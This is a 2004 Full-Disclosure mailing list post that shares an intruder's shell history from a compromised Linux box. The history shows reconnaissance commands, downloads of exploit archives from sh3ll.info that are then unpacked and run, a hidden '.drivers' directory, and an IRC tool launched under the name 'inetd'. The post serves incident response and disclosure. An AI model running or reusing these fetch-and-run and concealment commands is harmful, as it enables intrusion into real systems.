Greetings list, Accidentially sent only to Stefan, so redoing it.
On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote: > Hmmm - I have also been getting those login attemps, but thought them to > be harmless. Maybe they are not *that* harmless, though... Today I > managed to get my hands on a machine that was originating such login > attempts. I must admit I am far from being a linux security expert, but > this is what I've found out up to now: > I got a similar experience from a game box I look after (void.labs.pulltheplug.com, but people may prefer http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @ irc.pulltheplug.com, #social or #vortex). The .bash_history is as follows: passwd uname -a cat /etc/issue w /sbin.ifconfig /sbin/ifconfig wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt ftp ftp.sh3ll.info lynx lynx www.sh3ll.info/milenium/xpl.tgz ls ls -alF tar zxv xpl.tgz tar zxvf xpl.tgz cd supe` cd super ./prt lynx mil3nium.go.ro/milenium lynx mil3nium.go.ro/ ncftp ncftpget lynx sh3ll.info/milenium/milenium ls ls -alF ps -aux |grep test lynx sh3ll.info/milenium/psy1985.tgz mkdir .drivers mv psy1985.tgz .drivers cd .drivers tar zxvf psy1985.tgz rm -rf psy1985.tgz cd nsmail/ PATH='.:$PATH' inetd -e -o It would appear that if they can't get a local root, they'll use the box for IRCing from. Hopefully this helps someone. I haven't looked too much into this, if wanted I could grab the source ip addresses used for logging into guest, but thats probably not overly useful. Thanks, Andrew Griffiths _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
